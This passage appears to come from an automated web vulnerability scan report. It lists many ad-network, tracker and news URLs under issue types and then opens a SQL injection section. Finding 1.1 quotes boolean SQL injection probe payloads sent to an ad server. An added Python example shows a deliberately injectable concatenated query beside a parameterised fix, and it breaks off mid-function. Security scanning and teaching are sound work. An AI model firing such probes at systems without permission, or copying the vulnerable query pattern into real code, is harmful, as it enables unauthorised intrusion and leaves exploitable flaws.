19.725. http://www.facebook.com/plugins/like.php

19.726. http://www.facebook.com/plugins/like.php

19.727. http://www.facebook.com/plugins/like.php

19.728. http://www.facebook.com/plugins/like.php

19.729. http://www.facebook.com/plugins/like.php

19.730. http://www.facebook.com/plugins/like.php

19.731. http://www.facebook.com/plugins/like.php

19.732. http://www.facebook.com/plugins/like.php

19.733. http://www.facebook.com/plugins/like.php

19.734. http://www.facebook.com/plugins/like.php

19.735. http://www.facebook.com/plugins/like.php

19.736. http://www.facebook.com/plugins/like.php

19.737. http://www.facebook.com/plugins/like.php

19.738. http://www.facebook.com/plugins/like.php

19.739. http://www.facebook.com/plugins/like.php

19.740. http://www.facebook.com/plugins/like.php

19.741. http://www.facebook.com/plugins/like.php

19.742. http://www.facebook.com/plugins/like.php

19.743. http://www.facebook.com/plugins/like.php

19.744. http://www.facebook.com/plugins/like.php

19.745. http://www.facebook.com/plugins/like.php

19.746. http://www.facebook.com/plugins/like.php

19.747. http://www.facebook.com/plugins/like.php

19.748. http://www.facebook.com/plugins/like.php

19.749. http://www.facebook.com/plugins/like.php

19.750. http://www.facebook.com/plugins/like.php

19.751. http://www.facebook.com/plugins/like.php

19.752. http://www.facebook.com/plugins/like.php

19.753. http://www.facebook.com/plugins/like.php

19.754. http://www.facebook.com/plugins/like.php

19.755. http://www.facebook.com/plugins/like.php

19.756. http://www.facebook.com/plugins/like.php

19.757. http://www.facebook.com/plugins/like.php

19.758. http://www.facebook.com/plugins/like.php

19.759. http://www.facebook.com/plugins/like.php

19.760. http://www.facebook.com/plugins/like.php

19.761. http://www.facebook.com/plugins/like.php

19.762. http://www.facebook.com/plugins/like.php

19.763. http://www.facebook.com/plugins/like.php

19.764. http://www.facebook.com/plugins/like.php

19.765. http://www.facebook.com/plugins/like.php

19.766. http://www.facebook.com/plugins/like.php

19.767. http://www.facebook.com/plugins/like.php

19.768. http://www.facebook.com/plugins/like.php

19.769. http://www.facebook.com/plugins/like.php

19.770. http://www.facebook.com/plugins/like.php

19.771. http://www.facebook.com/plugins/like.php

19.772. http://www.facebook.com/plugins/like.php

19.773. http://www.facebook.com/plugins/like.php

19.774. http://www.facebook.com/plugins/like.php

19.775. http://www.facebook.com/plugins/like.php

19.776. http://www.facebook.com/plugins/like.php

19.777. http://www.facebook.com/plugins/like.php

19.778. http://www.facebook.com/plugins/like.php

19.779. http://www.facebook.com/plugins/like.php

19.780. http://www.facebook.com/plugins/like.php

19.781. http://www.facebook.com/plugins/like.php

19.782. http://www.facebook.com/plugins/like.php

19.783. http://www.facebook.com/plugins/like.php

19.784. http://www.facebook.com/plugins/like.php

19.785. http://www.facebook.com/plugins/like.php

19.786. http://www.facebook.com/plugins/like.php

19.787. http://www.facebook.com/plugins/like.php

19.788. http://www.facebook.com/plugins/like.php

19.789. http://www.facebook.com/plugins/like.php

19.790. http://www.facebook.com/plugins/like.php

19.791. http://www.facebook.com/plugins/like.php

19.792. http://www.facebook.com/plugins/like.php

19.793. http://www.facebook.com/plugins/like.php

19.794. http://www.facebook.com/plugins/like.php

19.795. http://www.facebook.com/plugins/like.php

19.796. http://www.facebook.com/plugins/like.php

19.797. http://www.facebook.com/plugins/like.php

19.798. http://www.facebook.com/plugins/like.php

19.799. http://www.facebook.com/plugins/like.php

19.800. http://www.facebook.com/plugins/like.php

19.801. http://www.facebook.com/plugins/like.php

19.802. http://www.facebook.com/plugins/like.php

19.803. http://www.facebook.com/plugins/like.php

19.804. http://www.facebook.com/plugins/like.php

19.805. http://www.facebook.com/plugins/like.php

19.806. http://www.facebook.com/plugins/like.php

19.807. http://www.facebook.com/plugins/like.php

19.808. http://www.facebook.com/plugins/like.php

19.809. http://www.facebook.com/plugins/like.php

19.810. http://www.facebook.com/plugins/like.php

19.811. http://www.facebook.com/plugins/like.php

19.812. http://www.facebook.com/plugins/like.php

19.813. http://www.facebook.com/plugins/like.php

19.814. http://www.facebook.com/plugins/like.php

19.815. http://www.facebook.com/plugins/like.php

19.816. http://www.facebook.com/plugins/like.php

19.817. http://www.facebook.com/plugins/like.php

19.818. http://www.facebook.com/plugins/like.php

19.819. http://www.facebook.com/plugins/like.php

19.820. http://www.facebook.com/plugins/like.php

19.821. http://www.facebook.com/plugins/like.php

19.822. http://www.facebook.com/plugins/like.php

19.823. http://www.facebook.com/plugins/like.php

19.824. http://www.facebook.com/plugins/like.php

19.825. http://www.facebook.com/plugins/like.php

19.826. http://www.facebook.com/plugins/like.php

19.827. http://www.facebook.com/plugins/like.php

19.828. http://www.facebook.com/plugins/like.php

19.829. http://www.facebook.com/plugins/like.php

19.830. http://www.facebook.com/plugins/like.php

19.831. http://www.facebook.com/plugins/like.php

19.832. http://www.facebook.com/plugins/like.php

19.833. http://www.facebook.com/plugins/like.php

19.834. http://www.facebook.com/plugins/like.php

19.835. http://www.facebook.com/plugins/like.php

19.836. http://www.facebook.com/plugins/like.php

19.837. http://www.facebook.com/plugins/like.php

19.838. http://www.facebook.com/plugins/like.php

19.839. http://www.facebook.com/plugins/like.php

19.840. http://www.facebook.com/plugins/like.php

19.841. http://www.facebook.com/plugins/like.php

19.842. http://www.facebook.com/plugins/like.php

19.843. http://www.facebook.com/plugins/like.php

19.844. http://www.facebook.com/plugins/like.php

19.845. http://www.facebook.com/plugins/like.php

19.846. http://www.facebook.com/plugins/like.php

19.847. http://www.facebook.com/plugins/like.php

19.848. http://www.facebook.com/plugins/like.php

19.849. http://www.facebook.com/plugins/like.php

19.850. http://www.facebook.com/plugins/like.php

19.851. http://www.facebook.com/plugins/like.php

19.852. http://www.facebook.com/plugins/like.php

19.853. http://www.facebook.com/plugins/like.php

19.854. http://www.facebook.com/plugins/like.php

19.855. http://www.facebook.com/plugins/like.php

19.856. http://www.facebook.com/plugins/like.php

19.857. http://www.facebook.com/plugins/like.php

19.858. http://www.facebook.com/plugins/like.php

19.859. http://www.facebook.com/plugins/like.php

19.860. http://www.facebook.com/plugins/like.php

19.861. http://www.facebook.com/plugins/like.php

19.862. http://www.facebook.com/plugins/like.php

19.863. http://www.facebook.com/plugins/like.php

19.864. http://www.facebook.com/plugins/like.php

19.865. http://www.facebook.com/plugins/like.php

19.866. http://www.facebook.com/plugins/like.php

19.867. http://www.facebook.com/plugins/like.php

19.868. http://www.facebook.com/plugins/like.php

19.869. http://www.facebook.com/plugins/like.php

19.870. http://www.facebook.com/plugins/like.php

19.871. http://www.facebook.com/plugins/like.php

19.872. http://www.facebook.com/plugins/like.php

19.873. http://www.facebook.com/plugins/like.php

19.874. http://www.facebook.com/plugins/like.php

19.875. http://www.facebook.com/plugins/like.php

19.876. http://www.facebook.com/plugins/like.php

19.877. http://www.facebook.com/plugins/like.php

19.878. http://www.facebook.com/plugins/like.php

19.879. http://www.facebook.com/plugins/like.php

19.880. http://www.facebook.com/plugins/like.php

19.881. http://www.facebook.com/plugins/like.php

19.882. http://www.facebook.com/plugins/like.php

19.883. http://www.facebook.com/plugins/like.php

19.884. http://www.facebook.com/plugins/like.php

19.885. http://www.facebook.com/plugins/like.php

19.886. http://www.facebook.com/plugins/like.php

19.887. http://www.facebook.com/plugins/like.php

19.888. http://www.facebook.com/plugins/like.php

19.889. http://www.facebook.com/plugins/like.php

19.890. http://www.facebook.com/plugins/like.php

19.891. http://www.facebook.com/plugins/like.php

19.892. http://www.facebook.com/plugins/like.php

19.893. http://www.facebook.com/plugins/like.php

19.894. http://www.facebook.com/plugins/like.php

19.895. http://www.facebook.com/plugins/like.php

19.896. http://www.facebook.com/plugins/like.php

19.897. http://www.facebook.com/plugins/like.php

19.898. http://www.facebook.com/plugins/like.php

19.899. http://www.facebook.com/plugins/like.php

19.900. http://www.facebook.com/plugins/like.php

19.901. http://www.facebook.com/plugins/like.php

19.902. http://www.facebook.com/plugins/like.php

19.903. http://www.facebook.com/plugins/recommendations.php

19.904. http://www.facebook.com/plugins/recommendations.php

19.905. http://www.facebook.com/plugins/recommendations.php

19.906. http://www.facebook.com/plugins/recommendations.php

19.907. http://www.facebook.com/plugins/recommendations.php

19.908. http://www.facebook.com/plugins/recommendations.php

19.909. http://www.facebook.com/plugins/recommendations.php

19.910. http://www.facebook.com/plugins/recommendations.php

19.911. http://www.facebook.com/plugins/recommendations.php

19.912. http://www.facebook.com/plugins/recommendations.php

19.913. http://www.facebook.com/plugins/recommendations.php

19.914. http://www.facebook.com/plugins/recommendations.php

19.915. http://www.facebook.com/plugins/recommendations.php

19.916. http://www.facebook.com/plugins/recommendations.php

19.917. http://www.facebook.com/plugins/recommendations.php

19.918. http://www.facebook.com/plugins/recommendations.php

19.919. http://www.facebook.com/plugins/recommendations.php

19.920. http://www.facebook.com/plugins/recommendations.php

19.921. http://www.facebook.com/plugins/recommendations.php

19.922. http://www.facebook.com/plugins/recommendations.php

19.923. http://www.facebook.com/plugins/recommendations.php

19.924. http://www.facebook.com/plugins/recommendations.php

19.925. http://www.facebook.com/plugins/recommendations.php

19.926. http://www.facebook.com/plugins/recommendations.php

19.927. http://www.facebook.com/plugins/recommendations.php

19.928. http://www.facebook.com/plugins/recommendations.php

19.929. http://www.facebook.com/plugins/recommendations.php

19.930. http://www.facebook.com/plugins/recommendations.php

19.931. http://www.facebook.com/plugins/recommendations.php

19.932. http://www.facebook.com/plugins/recommendations.php

19.933. http://www.facebook.com/plugins/recommendations.php

19.934. http://www.facebook.com/plugins/recommendations.php

19.935. http://www.facebook.com/plugins/recommendations.php

19.936. http://www.facebook.com/plugins/recommendations.php

19.937. http://www.facebook.com/plugins/recommendations.php

19.938. http://www.facebook.com/plugins/recommendations.php

19.939. http://www.facebook.com/plugins/recommendations.php

19.940. http://www.facebook.com/plugins/recommendations.php

19.941. http://www.facebook.com/plugins/recommendations.php

19.942. http://www.facebook.com/plugins/recommendations.php

19.943. http://www.facebook.com/plugins/recommendations.php

19.944. http://www.facebook.com/plugins/recommendations.php

19.945. http://www.facebook.com/plugins/recommendations.php

19.946. http://www.facebook.com/plugins/recommendations.php

19.947. http://www.facebook.com/plugins/recommendations.php

19.948. http://www.facebook.com/plugins/recommendations.php

19.949. http://www.facebook.com/plugins/recommendations.php

19.950. http://www.facebook.com/plugins/recommendations.php

19.951. http://www.facebook.com/plugins/recommendations.php

19.952. http://www.facebook.com/plugins/recommendations.php

19.953. http://www.facebook.com/plugins/recommendations.php

19.954. http://www.facebook.com/plugins/recommendations.php

19.955. http://www.facebook.com/plugins/recommendations.php

19.956. http://www.facebook.com/plugins/recommendations.php

19.957. http://www.facebook.com/plugins/recommendations.php

19.958. http://www.facebook.com/plugins/recommendations.php

19.959. http://www.facebook.com/plugins/recommendations.php

19.960. http://www.facebook.com/plugins/recommendations.php

19.961. http://www.facebook.com/plugins/recommendations.php

19.962. http://www.facebook.com/plugins/recommendations.php

19.963. http://www.facebook.com/plugins/recommendations.php

19.964. http://www.facebook.com/plugins/recommendations.php

19.965. http://www.facebook.com/plugins/recommendations.php

19.966. http://www.facebook.com/plugins/recommendations.php

19.967. http://www.facebook.com/plugins/recommendations.php

19.968. http://www.facebook.com/plugins/recommendations.php

19.969. http://www.facebook.com/plugins/recommendations.php

19.970. http://www.facebook.com/plugins/recommendations.php

19.971. http://www.facebook.com/plugins/recommendations.php

19.972. http://www.facebook.com/plugins/recommendations.php

19.973. http://www.facebook.com/plugins/recommendations.php

19.974. http://www.facebook.com/plugins/recommendations.php

19.975. http://www.facebook.com/plugins/recommendations.php

19.976. http://www.facebook.com/plugins/recommendations.php

19.977. http://www.facebook.com/plugins/recommendations.php

19.978. http://www.facebook.com/plugins/recommendations.php

19.979. http://www.facebook.com/plugins/recommendations.php

19.980. http://www.facebook.com/plugins/recommendations.php

19.981. http://www.facebook.com/plugins/recommendations.php

19.982. http://www.facebook.com/plugins/recommendations.php

19.983. http://www.facebook.com/plugins/recommendations.php

19.984. http://www.facebook.com/plugins/recommendations.php

19.985. http://www.facebook.com/plugins/recommendations.php

19.986. http://www.facebook.com/plugins/recommendations.php

19.987. http://www.facebook.com/plugins/recommendations.php

19.988. http://www.facebook.com/plugins/recommendations.php

19.989. http://www.facebook.com/plugins/recommendations.php

19.990. http://www.facebook.com/widgets/recommendations.php

19.991. http://www.facebook.com/widgets/recommendations.php

20. Credit card numbers disclosed

21. Robots.txt file

21.1. http://a.rfihub.com/sed

21.2. http://a.tribalfusion.com/j.ad

21.3. http://a1.sndcdn.com/stylesheets/special.css

21.4. http://ad.burstdirectads.com/unpixel

21.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

21.6. http://ad.yieldmanager.com/pixel

21.7. http://ads.bluelithium.com/st

21.8. http://ads.pointroll.com/PortalServe/

21.9. http://ads.undertone.com/ajs.php

21.10. http://adserver.adtechus.com/bind

21.11. http://adsfac.us/ag.asp

21.12. http://adx.g.doubleclick.net/pagead/adview

21.13. http://altfarm.mediaplex.com/ad/js/17038-128465-5934-2

21.14. http://am.nexac.com/match

21.15. http://amch.questionmarket.com/adscgen/st.php

21.16. http://api.bizographics.com/v1/profile.json

21.17. http://b.scorecardresearch.com/b

21.18. http://b.voicefive.com/b2

21.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

21.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

21.21. http://c.betrad.com/a/n/273/1153.js

21.22. http://c7.zedo.com/img/bh.gif

21.23. http://cache.specificmedia.com/creative/blank.gif

21.24. http://cas.criteo.com/delivery/afr.php

21.25. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162

21.26. http://cdn.krxd.net/config/

21.27. http://cdn.turn.com/server/ddc.htm

21.28. http://cdn5.tribalfusion.com/media/1956006/frame.html

21.29. http://check4.facebook.com/ajax/v6.php

21.30. http://check6.facebook.com/ajax/v6.php

21.31. http://cheetah.vizu.com/i.gif

21.32. http://citi.bridgetrack.com/usc/_spredir.htm

21.33. http://click.linksynergy.com/fs-bin/click

21.34. http://clickserve.cc-dt.com/link/click

21.35. http://cm.g.doubleclick.net/pixel

21.36. http://commerce.wsj.com/auth/forgotpass

21.37. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

21.38. http://d7.zedo.com/img/bh.gif

21.39. http://dar.youknowbest.com/

21.40. http://dis.ny.us.criteo.com/dis/dis.aspx

21.41. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

21.42. http://ev.ib-ibi.com/image.sbix

21.43. http://feeds.bbci.co.uk/news/rss.xml

21.44. http://fls.doubleclick.net/activityi

21.45. http://gan.doubleclick.net/gan_impression

21.46. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049525132/

21.47. http://homedepot.ugc.bazaarvoice.com/static/1999q/r_5_ispacer.gif

21.48. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

21.49. http://imp.constantcontact.com/imp/cmp.jsp

21.50. http://l.addthiscdn.com/live/t00/250lo.gif

21.51. http://login.dotomi.com/ucm/UCMController

21.52. http://media2.legacy.com/bind

21.53. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s95367101319134

21.54. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

21.55. http://oc.creditcards.com/trans_node.php

21.56. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s18412435774225

21.57. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

21.58. http://online.wsj.com/djscript/latest/dijit/nls/loading.js

21.59. http://p.addthis.com/pixel

21.60. http://p.opt.fimserve.com/bht/

21.61. http://pagead2.googlesyndication.com/pagead/imgad

21.62. http://pbid.pro-market.net/engine

21.63. http://pixel.everesttech.net/1688/i

21.64. http://pixel.invitemedia.com/admeld_sync

21.65. http://pixel.quantserve.com/pixel

21.66. http://puma.vizu.com/cdn/00/00/20/73/smart_tag.js

21.67. http://r.turn.com/r/beacon

21.68. http://rd.rlcdn.com/rd

21.69. http://reviews.homedepot.com/1999q/202642971/reviews.htm

21.70. http://rmd.atdmt.com/tl/DEDENACCEACE/012f5850bb5d4d1c8cbf7566089f1db6/95c1b6c96f2e40f38e53ff93b84b6cd9012f5850bb5d4d1c8cbf7566089f1db6.js

21.71. http://rover.ebay.com/ar/1/76417/4

21.72. http://rt.legolas-media.com/lgrt

21.73. http://script.footprintlive.com/

21.74. http://segment-pixel.invitemedia.com/pixel

21.75. http://services.krxd.net/geoip

21.76. http://soundcloud.com/

21.77. https://soundcloud.com/login

21.78. http://spe.atdmt.com/ds/DEDENACCEACE/Accenture_Image_FY11_Video/us_shark_flash_728x90_8k_v1.gif

21.79. http://spotlight.creditcards.com/www/delivery/ajs.php

21.80. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.81. http://sync.mathtag.com/sync

21.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

21.83. http://tf.nexac.com/media/1809966/na.html

21.84. http://va.px.invitemedia.com/pixel

21.85. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15011168408673

21.86. http://www.bizographics.com/collect/

21.87. http://www.cnbc.com/redirect.aspx

21.88. http://www.creditcards.com/__ssard.png

21.89. http://www.facebook.com/widgets/recommendations.php

21.90. http://www.google-analytics.com/__utm.gif

21.91. http://www.googleadservices.com/pagead/conversion/1049525132/

21.92. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

21.93. http://www.ilslaunch.com/modules/node/node.css

21.94. http://www.inlandbusinesslaw.com/

21.95. http://www.lightsquared.com/

21.96. http://www.res-x.com/ws/r2/Resonance.aspx

21.97. http://www.wunderground.com/dotset.php

22. Cacheable HTTPS response

22.1. https://services.wsj.com/Gryphon/jsp/retentionController.jsp

22.2. https://soundcloud.com/login

22.3. https://www.mavitunasecurity.com/support/checkupdate/

23. HTML does not specify charset

23.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

23.2. http://480-adver-view.c3metrics.com/v.js

23.3. http://a.tribalfusion.com/p.media/a0mNJHpdZao56Zb14cbeTGJaWcJkSAMyWdJUUUn15bEtUEMqVEJ9PavIScZbJRrixPWvcWVbV2UenmtaOXayM2WYCQGFB26JFpWXpVWbb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBlsZb2kS/2020316/frame.html

23.4. http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

23.5. http://a.tribalfusion.com/p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html

23.6. http://a.tribalfusion.com/p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html

23.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

23.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

23.9. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

23.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4

23.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

23.12. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

23.13. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

23.14. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

23.15. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow

23.16. http://ads.bridgetrack.com/track/f/

23.17. http://amch.questionmarket.com/adscgen/st.php

23.18. http://api.cnbc.com/api/movers/movers.asp

23.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

23.20. http://b3.mookie1.com/2/B3DM/DLX/1@x71

23.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.22. http://cdn.krxd.net/kruxcontent/krux_iframe.html

23.23. http://cdn5.tribalfusion.com/media/1956006/frame.html

23.24. http://cdn5.tribalfusion.com/media/2516896//frm.html

23.25. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

23.26. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

23.27. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

23.28. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

23.29. http://ds.addthis.com/red/psi/sites/www.cnbc.com/p.json

23.30. http://fls.doubleclick.net/activityi

23.31. http://m.cnbc.com/mytest/ipecho.php

23.32. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js

23.33. http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html

23.34. http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html

23.35. http://optimized-by.rubiconproject.com/a/dk.html

23.36. http://pbid.pro-market.net/engine

23.37. http://platform.twitter.com/widgets/follow_button.html

23.38. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

23.39. https://soundcloud.com/login

23.40. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

23.41. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

23.42. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

23.43. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

23.44. http://tags.bluekai.com/site/2939

23.45. http://tf.nexac.com/media/1809966/na.html

23.46. http://uac.advertising.com/wrapper/aceUACping.htm

23.47. http://view.c3metrics.com/c3VTabstrct-6-2.php

23.48. http://www.inlandbusinesslaw.com/

23.49. http://www.inlandbusinesslaw.com/attorneyprofiles.html

23.50. http://www.inlandbusinesslaw.com/contactus.html

23.51. http://www.inlandbusinesslaw.com/mentoringprogram.html

23.52. http://www.nutter.com/attorneys.php

24. Content type incorrectly stated

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

24.2. http://480-adver-view.c3metrics.com/v.js

24.3. http://a1.interclick.com/getInPageJS.aspx

24.4. http://a1.interclick.com/getInPageJSProcess.aspx

24.5. http://adadvisor.net/adscores/g.js

24.6. http://amch.questionmarket.com/adscgen/st.php

24.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.8. http://cdn.slidesharecdn.com/nasbocasestudy110110-101102172823-phpapp02-thumbnail-2

24.9. http://cdn.slidesharecdn.com/thisoldportal2007-100208005551-phpapp02-thumbnail-2

24.10. http://cdn.slidesharecdn.com/yourjourneyyourway-100208010117-phpapp01-thumbnail-2

24.11. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

24.12. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

24.13. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

24.14. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

24.15. http://ilslaunch.app2.hubspot.com/salog.js.aspx

24.16. http://m.cnbc.com/mytest/ipecho.php

24.17. http://media.cnbc.com/i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg

24.18. http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg

24.19. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

24.20. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js

24.21. http://rt.legolas-media.com/lgrt

24.22. http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js

24.23. http://sales.liveperson.net/hcp/html/mTag.js

24.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

24.25. http://sr2.liveperson.net/hcp/html/mTag.js

24.26. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

24.27. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

24.28. http://view.c3metrics.com/c3VTabstrct-6-2.php

24.29. http://www.cnbc.com/default.ashx/id/23149822

24.30. http://www.facebook.com/extern/login_status.php

24.31. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json

24.32. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json

24.33. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png

24.34. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png

24.35. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_email.gif

24.36. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_print.gif

24.37. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png

24.38. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json

24.39. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

24.40. http://www.ilslaunch.com/sites/all/themes/ils/favicon.ico

24.41. http://www.lightsquared.com/wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff

24.42. https://www.mavitunasecurity.com/support/checkupdate/

24.43. http://www.nutter.com/attorneys.php

24.44. http://www.res-x.com/ws/r2/Resonance.aspx

24.45. http://www2.sesamestats.com/paneltracking.aspx

25. Content type is not specified

25.1. http://ads.bluelithium.com/st

25.2. http://ads.pointroll.com/PortalServe/

25.3. https://soundcloud.com/login

26. SSL certificate

26.1. https://services.wsj.com/

26.2. https://soundcloud.com/

26.3. https://www.mavitunasecurity.com/



1. SQL injection
There are 75 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
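The two tests the scanner relies on in this section, the boolean-difference pair (and 1=1 versus and 1=2) used here in 1.1 and the single-quote versus doubled-quote error probe used in 1.2, together with the parameterised-query remediation from the issue background, as one added example. This is illustrative code written for this page, not the scanner's logic or anything from the hosts listed; the ads table, the creative names and the function names are assumptions. It runs the probes against a concatenated query, against the same query with a bound parameter, and against a responder that rotates creatives on every call. In the two DoubleClick responses above the difference is a different click path and image served one second apart, which is exactly what a rotating ad server produces with no SQL involved, so the example repeats the unmodified baseline request first and refuses to draw a conclusion when identical requests already differ.

```python
import itertools
import sqlite3
from typing import Callable, Dict

# Constructed sample data standing in for whatever backs an ad-serving
# endpoint; the table, column names and creative names are assumptions.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE ads (slot TEXT, creative TEXT)")
_conn.executemany(
    "INSERT INTO ads VALUES (?, ?)",
    [("300x250", "creative_a.gif"), ("728x90", "creative_b.gif")],
)


def lookup_vulnerable(slot: str) -> str:
    """The flaw the scanner probes for: user input spliced into the SQL text."""
    sql = "SELECT creative FROM ads WHERE slot = '" + slot + "'"
    rows = _conn.execute(sql).fetchall()
    return "|".join(r[0] for r in rows) or "<no ad>"


def lookup_parameterised(slot: str) -> str:
    """The remediation: query structure fixed first, data bound second."""
    rows = _conn.execute("SELECT creative FROM ads WHERE slot = ?", (slot,)).fetchall()
    return "|".join(r[0] for r in rows) or "<no ad>"


_rotation = itertools.cycle(["creative_a.gif", "creative_b.gif"])


def lookup_rotating(slot: str) -> str:
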